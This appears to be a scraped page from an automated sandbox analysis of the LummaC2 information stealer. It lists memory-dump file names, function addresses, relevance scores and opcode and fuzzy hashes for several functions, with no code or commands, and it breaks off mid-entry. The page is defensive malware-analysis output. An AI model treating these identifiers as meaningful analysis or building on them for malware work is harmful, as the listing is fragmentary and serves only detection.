Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 981c8c254dd8717fe05185c0bbc858faf8de8f13b256b2954fc48b49913c8018
Instruction ID: 5df19b63ad52acb920938f94bc0a09ec44b247843ed9194bc609930cf580d6d0
Opcode Fuzzy Hash: 981c8c254dd8717fe05185c0bbc858faf8de8f13b256b2954fc48b49913c8018
Instruction Fuzzy Hash: F591D6716143169BCB16CF18D890A7AF3E6FFD8754F16893CEA8587260DB30AC21CB81

Function 002EDFC3 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526778625396f53eecbac5f1c3599a4072e6ddeb3f9daf19d3350fbecc153fce
Instruction ID: 484854ec9bd48ff99c793d8479bf6290e5250954fb3fb81bff32cad5ac7bbedc
Opcode Fuzzy Hash: 526778625396f53eecbac5f1c3599a4072e6ddeb3f9daf19d3350fbecc153fce
Instruction Fuzzy Hash: 3AD1F172608B814BD319CA38C8913A7BFD26BD6324F19CA7DD4EB877C6D578A405C702

Function 002FDEB0 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a6a2f3862421d50b12d437b4185abb659111720b0f50c3c613a2349c7e09d60e
Instruction ID: 3251049dde6bd0b4a55f9d14a08aa9557be222eb56085f81dfa5825567f4c96e
Opcode Fuzzy Hash: a6a2f3862421d50b12d437b4185abb659111720b0f50c3c613a2349c7e09d60e
Instruction Fuzzy Hash: 3191D47561420A9BDB25DF18C890A3BB3E2EF98750F16852CE5899B365DB30EC21CB41

Function 002C61D0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5140ca86dd5b4bcaba2cb1346e0d6ff8cb35f9844ba483e5f1b1bd21b4eb7be
Instruction ID: 435c99f891e2494480c0861e51f0148b1adfe3344c4f1c29ca830b191dd1854d
Opcode Fuzzy Hash: b5140ca86dd5b4bcaba2cb1346e0d6ff8cb35f9844ba483e5f1b1bd21b4eb7be
Instruction Fuzzy Hash: D2C16CB29587418FC370CF28CC86BABB7E1BF85318F084A2DD1D9C6242E778A155CB46

Function 002E8C46 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4755117cc93052eba2432196a05c8b9ec4b0d34f40451aa349b4d342ecb3587
Instruction ID: e1e64bdbb2d569f42d97f26459453d7717b83b53eba56e7be0758169808cf821
Opcode Fuzzy Hash: a4755117cc93052eba2432196a05c8b9ec4b0d34f40451aa349b4d342ecb3587
Instruction Fuzzy Hash: 3CA131B05583818FC714CF69C89266BBBE1EF91304F44492DF5D98B392E778E825CB82

Function 002FDBB0 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7794ba5bc3e4eae5f9089fb9da94e145318efbd281fa789d4244b1fcdfb60dbe
Instruction ID: a6f28cdc0e4075b4b38ab6887f8abbcf7bfe841e5a4ec7c74f54608ddd9c03f4
Opcode Fuzzy Hash: 7794ba5bc3e4eae5f9089fb9da94e145318efbd281fa789d4244b1fcdfb60dbe
Instruction Fuzzy Hash: F2816A76A252199BC7259F28C88067BF3A3EFD4790F19C53CD9C58B254EB30AD21D781

Function 002DD560 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06864a3c8131a94f73eabb36063f88b7f93761b2f2a54454e0c508e17e2b0514
Instruction ID: 472d7b6646dfc303f6de297b2bcd9e59559d75ac5272a40322207168444f929a
Opcode Fuzzy Hash: 06864a3c8131a94f73eabb36063f88b7f93761b2f2a54454e0c508e17e2b0514
Instruction Fuzzy Hash: 9A916B72A146624FCB158E28C8513AEBBE1ABC5324F19867EE8B9873C1D774DC16D7C0

Function 002E7D94 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd43c2d7418ae24842856e4e9e3c43543f340d9282a6b1dc359461af6515c20b
Instruction ID: 4728c912124570881dddd367c10f81f6d2057b8e25e9f2971c6040566861e1a3
Opcode Fuzzy Hash: dd43c2d7418ae24842856e4e9e3c43543f340d9282a6b1dc359461af6515c20b
Instruction Fuzzy Hash: EF9153B6E50245CFDB058F95D8A0BAEBBB1FF48314F19422DE54A6B391C775A811CF80

Function 002F74F0 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3540b8dcb3796ad3ed13a45f835b084e0100de2d2b88d817ff22d44ee30c3d6f
Instruction ID: e77d8032c23f1ba49510c760b7bb553acdfc1bf192a6116dfdecbc64c6a3e3f5
Opcode Fuzzy Hash: 3540b8dcb3796ad3ed13a45f835b084e0100de2d2b88d817ff22d44ee30c3d6f
Instruction Fuzzy Hash: 4E6176B26292099BD314DF28DC91B7BB3DAEBC4344F54883CE685C7280EA75D9158B92

Function 002FA0D0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b924f6f82710e48aa54d7ca37d26bd518472bb0771a27e487dd4392f1a489c41
Instruction ID: c73f0baac0cbdb96e027e7704e47e90cbc425f31f63d73047fe4dc68bc4dd0d0
Opcode Fuzzy Hash: b924f6f82710e48aa54d7ca37d26bd518472bb0771a27e487dd4392f1a489c41
Instruction Fuzzy Hash: 01517EB57183094FEB249F24D85173BF7D5EB95740F19883CDACA97342E6329C218B86

Function 002FA510 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f703763bdafa924d72e68af58cedd053a3f7ebf74bd3e0fa7740eb656c600e9
Instruction ID: 1918589e9535e5a53e2372124bd102d0f3fbb5a0d8cacfc59f49862c93a40aca
Opcode Fuzzy Hash: 4f703763bdafa924d72e68af58cedd053a3f7ebf74bd3e0fa7740eb656c600e9
Instruction Fuzzy Hash: C1518875E143198FDB209F28C88067BF7AAEBD9750F19893CC68997251D771DC22CB82

Function 002DDFC0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aa869641c873d47072fcd1e829dbf2a4edee556635f44394a42d01095110576
Instruction ID: d6fc0e8d420a0bc2f71448aedb7553d1657dd7f5e732c62823dc6de695e0d870
Opcode Fuzzy Hash: 2aa869641c873d47072fcd1e829dbf2a4edee556635f44394a42d01095110576
Instruction Fuzzy Hash: 57613A33769A804BDB28A97C5CA226679970BD6330F2EC76F96B58B3E1D9A54C114340

Function 002E30E0 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0de9726a486751b0ee84c7af038f1681bdf9606982a9efbaa7b9ea12b8e816f6
Instruction ID: 9a59a5ff4c163b6f5eb0b5ee8b36f883c3a46cb2aed05790be37832f586b43ba
Opcode Fuzzy Hash: 0de9726a486751b0ee84c7af038f1681bdf9606982a9efbaa7b9ea12b8e816f6
Instruction Fuzzy Hash: C0513475A19202CBE719CF29DC6036A73E6FB88311F09867DE986D7290CB74DD21CB80

Function 002F5FF0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9660528848eb795099f5dbc418725243399d0dc5ee54d9a413ace79cd833391
Instruction ID: 679b74410c991c63c4402aa207d1529f7cb3a315b8c35ea38444a117f54de80c
Opcode Fuzzy Hash: c9660528848eb795099f5dbc418725243399d0dc5ee54d9a413ace79cd833391
Instruction Fuzzy Hash: 6D516AB15087488FE714DF29D89436BFBE1FB84354F044A2DE5E983351E779DA088B82

Function 002D92C0 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e8cddfd27df1ea8902d2e65e1c06a7124540f7f5dbc24891e8322f5fa5e3b97
Instruction ID: f876ca24800b9afef775a83b11133159f285cdcefd5d6e27513a09d24e2ef99f
Opcode Fuzzy Hash: 4e8cddfd27df1ea8902d2e65e1c06a7124540f7f5dbc24891e8322f5fa5e3b97
Instruction Fuzzy Hash: 325127B29242118BC7119F24DC92BAB73E4FF86354F08456EF999873A1E334DD60CB52

Function 002CEDB4 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 03d0b781ef6dd382fb2866d0992a9bf47dbebd2c5d235791cccd4764a9949992
Instruction ID: 93a1497b74354eff062efdad2dd3d1e90dee864e4f312fd32055561d9cd2b4a7
Opcode Fuzzy Hash: 03d0b781ef6dd382fb2866d0992a9bf47dbebd2c5d235791cccd4764a9949992
Instruction Fuzzy Hash: EC5123756182C18FD724CF28D890BBEB7E6ABD8354F24CA2DD4C697245DB318852CB85

Function 002EB078 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0378ab55b7c4a7533f9dbd5cd8de895fac3f0b377934845a704229461a0ee399
Instruction ID: 8723605d68904402ae69857f645a7ee92801d914f95e15efe3ca72ec6ee2e54a
Opcode Fuzzy Hash: 0378ab55b7c4a7533f9dbd5cd8de895fac3f0b377934845a704229461a0ee399
Instruction Fuzzy Hash: 9A41266455C3C29BE7368F2A98B07B7BBD0DF62304F284C6DE4DA8B242D7704915CB52

Function 002F7D00 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b37c03bb4fc5488e7397aff8ecb9b4caa1fad9b346170f265a24685482e4f08c
Instruction ID: 3a6c4d18d9aca93d55a5e4c765a63cd19a91d579aedb21e0a816af3440e75ba6
Opcode Fuzzy Hash: b37c03bb4fc5488e7397aff8ecb9b4caa1fad9b346170f265a24685482e4f08c
Instruction Fuzzy Hash: 744129B2A183095BE710AE14DC81B7BF7EAEF85744F14083DF68593201E732ED248B96

Function 002F7EA0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49588468f4a352f4693d4c90c6e1848724b645c41352eb3d467dfdc9ac2005af
Instruction ID: 6c062d16ae144c5b982aeb7dec665b74fd43520ea7e7be7a4cb9fe28c9108568
Opcode Fuzzy Hash: 49588468f4a352f4693d4c90c6e1848724b645c41352eb3d467dfdc9ac2005af
Instruction Fuzzy Hash: DD41F673A296144BD304CE398C4026BFA936BD5370F2AC73DEAB5D73D5DAB98C154281

Function 002FF040 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b72f41db4293a03fa9ab8c9d7b01cbdf492d4881bf012de8b9179c14c0c2e9b8
Instruction ID: 2bdb16c8ae1179f200bf359ecb30470255f5bd72cd66c0d0704376b5e5f8ab00
Opcode Fuzzy Hash: b72f41db4293a03fa9ab8c9d7b01cbdf492d4881bf012de8b9179c14c0c2e9b8
Instruction Fuzzy Hash: E141237121530DEFE3648E15DED0B37F3AAEB88754F24853CE6C997250DA70B820C645

Function 002FB46A Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9270f0c4b44bd452a8aa2533342f24853695d2dd18b873e1b13bf2b06d0442d1
Instruction ID: 8ecb14a5e6ac6be069e4236eff32d7bd76a766a3c3f06c439f80d4cacbc35971
Opcode Fuzzy Hash: 9270f0c4b44bd452a8aa2533342f24853695d2dd18b873e1b13bf2b06d0442d1
Instruction Fuzzy Hash: 3F4158B5A206069BCB09CF38DC612BDBBA2FB95300F08862DD002E7355EB746566CB84

Function 002D6D52 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ac7e2e96c5e07d5221b4959d51c8e80b69e5515eb79c579c654bc55b91d02c3
Instruction ID: 9ba998b925d622910f0af647ad97cee2103b5f26f86429348d91343a833854c7
Opcode Fuzzy Hash: 5ac7e2e96c5e07d5221b4959d51c8e80b69e5515eb79c579c654bc55b91d02c3
Instruction Fuzzy Hash: EB11B7B572D2028BD719CF25D8551277796FB99319F28852FC0C693311D635CC668B06

Function 002C8A20 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 293d11ecb15a4287942a121f2196c36d4946016947497cfec40f8ac486ff9ff3
Instruction ID: 094236e5bb6842f33e3a6efd59e4afd6ac5711d920f5cc46ecfab08ee821bf3f
Opcode Fuzzy Hash: 293d11ecb15a4287942a121f2196c36d4946016947497cfec40f8ac486ff9ff3
